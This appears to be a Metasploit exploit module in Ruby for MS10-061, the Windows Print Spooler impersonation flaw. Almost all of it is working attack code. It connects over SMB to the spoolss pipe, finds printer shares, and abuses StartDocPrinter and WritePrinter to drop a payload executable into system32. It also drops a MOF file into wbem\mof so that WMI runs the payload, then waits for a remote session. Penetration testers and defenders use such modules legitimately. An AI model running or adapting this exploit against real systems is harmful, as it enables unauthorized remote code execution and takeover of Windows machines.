439 lines
12 KiB
Ruby
439 lines
12 KiB
Ruby
##
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# This module requires Metasploit: http//metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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require 'msf/windows_error'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = ExcellentRanking
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include Msf::Exploit::Remote::DCERPC
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include Msf::Exploit::Remote::SMB
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include Msf::Exploit::EXE
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include Msf::Exploit::WbemExec
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Microsoft Print Spooler Service Impersonation Vulnerability',
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'Description' => %q{
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This module exploits the RPC service impersonation vulnerability detailed in
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Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the
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StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service
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to create a file. The working directory at the time is %SystemRoot%\\system32.
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An attacker can specify any file name, including directory traversal or full paths.
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By sending WritePrinter requests, an attacker can fully control the content of
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the created file.
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In order to gain code execution, this module writes to a directory used by Windows
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Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)
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is periodically scanned and any new .mof files are processed automatically. This is
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the same technique employed by the Stuxnet code found in the wild.
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},
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'Author' =>
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[
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'jduck', # re-discovery, printer RPC stubs, module
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'hdm' # ATSVC RPC proxy method, etc ;)
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],
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'License' => MSF_LICENSE,
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'Platform' => 'win',
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'References' =>
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[
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[ 'OSVDB', '67988' ],
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[ 'CVE', '2010-2729' ],
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[ 'MSB', 'MS10-061' ]
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],
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'Privileged' => true,
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'Payload' =>
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{
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'Space' => 1024,
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'BadChars' => "",
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'DisableNops' => true,
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},
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'Targets' =>
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[
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[ 'Windows Universal', { } ]
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],
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'DisclosureDate' => 'Sep 14 2010',
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'DefaultTarget' => 0))
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register_options(
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[
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OptString.new('SMBPIPE', [ false, "The named pipe for the spooler service", "spoolss"]),
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OptString.new('PNAME', [ false, "The printer share name to use on the target" ]),
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], self.class)
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end
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def exploit
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connect()
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login_time = Time.now
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smb_login()
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print_status("Trying target #{target.name}...")
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handle = dcerpc_handle('12345678-1234-abcd-EF00-0123456789ab', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
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print_status("Binding to #{handle} ...")
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dcerpc_bind(handle)
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print_status("Bound to #{handle} ...")
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# Try all of the printers :)
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printers = []
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if (pname = datastore['PNAME'])
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printers << pname
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else
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res = self.simple.client.trans(
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"\\PIPE\\LANMAN",
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(
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[0x00].pack('v') +
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"WrLeh\x00" +
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"B13BWz\x00" +
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[0x01, 65406].pack("vv")
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)
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)
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printers = []
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lerror, lconv, lentries, lcount = res['Payload'].to_s[
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res['Payload'].v['ParamOffset'],
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res['Payload'].v['ParamCount']
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].unpack("v4")
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data = res['Payload'].to_s[
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res['Payload'].v['DataOffset'],
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res['Payload'].v['DataCount']
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]
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0.upto(lentries - 1) do |i|
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sname,tmp = data[(i * 20) + 0, 14].split("\x00")
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stype = data[(i * 20) + 14, 2].unpack('v')[0]
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scoff = data[(i * 20) + 16, 2].unpack('v')[0]
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if ( lconv != 0)
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scoff -= lconv
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end
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scomm,tmp = data[scoff, data.length - scoff].split("\x00")
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# we only want printers
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next if stype != 1
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printers << sname
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end
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end
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# Generate a payload EXE to execute
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exe = generate_payload_exe
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printers.each { |pr|
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pname = "\\\\#{rhost}\\#{pr}"
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print_status("Attempting to exploit MS10-061 via #{pname} ...")
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# Open the printer
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status,ph = open_printer_ex(pname)
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if status != 0
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fail_with(Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}")
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end
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print_status("Printer handle: %s" % ph.unpack('H*'))
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# NOTE: fname can be anything nice to write to (cwd is system32), even
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# directory traversal and full paths are OK.
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fname = rand_text_alphanumeric(14) + ".exe"
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write_file_contents(ph, fname, exe)
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# Generate a MOF file and write it so that the Windows Management Service will
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# execute our binary ;)
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mofname = rand_text_alphanumeric(14) + ".mof"
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mof = generate_mof(mofname, fname)
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write_file_contents(ph, "wbem\\mof\\#{mofname}", mof)
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# ClosePrinter
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status,ph = close_printer(ph)
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if status != 0
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fail_with(Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}")
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end
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break if session_created?
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}
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print_status("Everything should be set, waiting for a session...")
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handler
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cnt = 1
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while session_created? == false and cnt < 25
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::IO.select(nil, nil, nil, 0.25)
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cnt += 1
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end
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disconnect
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rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError
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fail_with(Failure::Unknown, $!.message)
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end
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#
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# Use the vuln to write a file :)
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#
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def write_file_contents(ph, fname, data)
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doc = rand_text_alphanumeric(16+rand(16))
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# StartDocPrinter
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status,jobid = start_doc_printer(ph, doc, fname)
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if status != 0 or jobid < 0
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fail_with(Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}")
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end
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print_status("Job started: 0x%x" % jobid)
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# WritePrinter
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status,wrote = write_printer(ph, data)
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if status != 0 or wrote != data.length
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fail_with(Failure::Unknown, ('Failed to write %d bytes!' % data.length))
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end
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print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname])
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# EndDocPrinter
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status = end_doc_printer(ph)
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if status != 0
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fail_with(Failure::Unknown, "Failed to end print job: #{Msf::WindowsError.description(status)}")
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end
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end
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#
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# Call RpcOpenPrinterEx
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#
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def open_printer_ex(pname, machine = nil, user = nil)
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=begin
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DWORD RpcOpenPrinterEx(
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[in, string, unique] STRING_HANDLE pPrinterName,
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[out] PRINTER_HANDLE* pHandle,
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[in, string, unique] wchar_t* pDatatype,
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[in] DEVMODE_CONTAINER* pDevModeContainer,
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[in] DWORD AccessRequired,
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[in] SPLCLIENT_CONTAINER* pClientInfo
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);
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=end
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# NOTE: For more information about this encoding, see the following
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# sections of the Open Group's C706 DCE 1.1: RPC
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#
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# 14.3.8 Unions
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# 14.3.10 Pointers
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# 14.3.12.3 Algorithm for Deferral of Referents
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#
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machine ||= ''
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machine = NDR.uwstring(machine)
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user ||= ''
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user = NDR.uwstring(user)
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splclient_info =
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NDR.long(0) + # DWORD dwSize;
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machine[0,4] + # [string] wchar_t* pMachineName;
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user[0,4] + # [string] wchar_t* pUserName;
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NDR.long(7600) + # DWORD dwBuildNum
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NDR.long(3) + # DWORD dwMajorVersion;
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NDR.long(0) + # DWORD dwMinorVersion;
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NDR.long(9) # unsigned short wProcessorArchitecture;
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# Add the deferred members
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splclient_info << machine[4, machine.length]
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splclient_info << user[4, user.length]
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splclient_info[0,4] = NDR.long(splclient_info.length)
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splclient_info =
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# union!
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NDR.long(1) + # discriminant (inside copy)
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NDR.long(rand(0xffffffff)) +
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splclient_info
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stubdata =
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NDR.uwstring(pname) + # pPrinterName
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NDR.long(0) +
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# DEVMODE_CONTAINER (null)
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NDR.long(0) +
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NDR.long(0) +
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# AccessRequired
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NDR.long(0x02020000) +
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# SPLCLIENT_CONTAINER
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NDR.long(1) + # Level (must be 1)
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# SPLCLIENT_INFO_1
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splclient_info
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#print_status('Sending OpenPrinterEx request...')
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response = dcerpc.call(69, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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#print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
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handle = dcerpc.last_response.stub_data[0,20]
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status = dcerpc.last_response.stub_data[20,4].unpack('V').first
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return [status, handle]
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end
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nil
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end
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#
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# Call RpcStartDocPrinter
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#
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def start_doc_printer(handle, dname, fname, dtype = nil)
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=begin
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typedef struct _DOC_INFO_CONTAINER {
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DWORD Level;
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[switch_is(Level)] union {
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[case(1)]
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DOC_INFO_1* pDocInfo1;
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} DocInfo;
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} DOC_INFO_CONTAINER;
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DWORD RpcStartDocPrinter(
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[in] PRINTER_HANDLE hPrinter,
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[in] DOC_INFO_CONTAINER* pDocInfoContainer,
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[out] DWORD* pJobId
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);
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=end
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dname = NDR.uwstring(dname)
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if fname
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fname = NDR.uwstring(fname)
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else
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fname = NDR.long(0)
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end
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if dtype
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dtype = NDR.uwstring(dtype)
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else
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dtype = NDR.long(0)
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end
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doc_info =
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dname[0, 4] +
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fname[0, 4] +
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dtype[0, 4]
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# Add the deferred members
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doc_info << dname[4, dname.length]
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doc_info << fname[4, fname.length]
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doc_info << dtype[4, dtype.length]
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doc_info =
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# Union!
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NDR.long(1) +
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NDR.long(rand(0xffffffff)) +
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doc_info
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stubdata =
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handle +
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NDR.long(1) +
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doc_info
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#print_status('Sending StartDocPrinter request...')
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response = dcerpc.call(17, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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#print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
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jobid, status = dcerpc.last_response.stub_data.unpack('VV')
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return [status, jobid]
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end
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nil
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end
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#
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# Call RpcWritePrinter
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#
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def write_printer(handle, data)
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=begin
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DWORD RpcWritePrinter(
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[in] PRINTER_HANDLE hPrinter,
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[in, size_is(cbBuf)] BYTE* pBuf,
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[in] DWORD cbBuf,
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[out] DWORD* pcWritten
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);
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=end
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stubdata =
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handle +
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NDR.long(data.length) +
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# Perhaps we need a better data type for BYTE* :)
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data +
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NDR.align(data) +
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NDR.long(data.length)
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#print_status('Sending WritePrinter request...')
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response = dcerpc.call(19, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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#print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
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wrote,status = dcerpc.last_response.stub_data.unpack('VV')
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return [status, wrote]
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end
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nil
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end
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#
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# Call RpcEndDocPrinter
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#
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def end_doc_printer(handle)
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=begin
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DWORD RpcEndDocPrinter(
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[in] PRINTER_HANDLE* phPrinter
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);
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=end
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#print_status('Sending EndDocPrinter request...')
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response = dcerpc.call(23, handle)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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#print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
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status = dcerpc.last_response.stub_data[0,4].unpack('V').first
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return status
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end
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nil
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end
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#
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# Call RpcClosePrinter
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#
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def close_printer(handle)
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=begin
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DWORD RpcClosePrinter(
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[in, out] PRINTER_HANDLE* phPrinter
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);
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=end
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#print_status('Sending ClosePrinter request...')
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response = dcerpc.call(29, handle)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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#print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
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handle = dcerpc.last_response.stub_data[0,20]
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status = dcerpc.last_response.stub_data[20,4].unpack('V').first
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return [status,handle]
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end
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nil
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end
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def seconds_since_midnight(time)
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# .tv_sec always uses .utc
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(time.tv_sec % 86400)
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# This method uses the localtime
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#(time.hour * 3600) + (time.min * 60) + (time.sec)
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end
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# We have to wait a bit longer since the WMI service is a bit slow..
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def wfs_delay
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10
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end
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end
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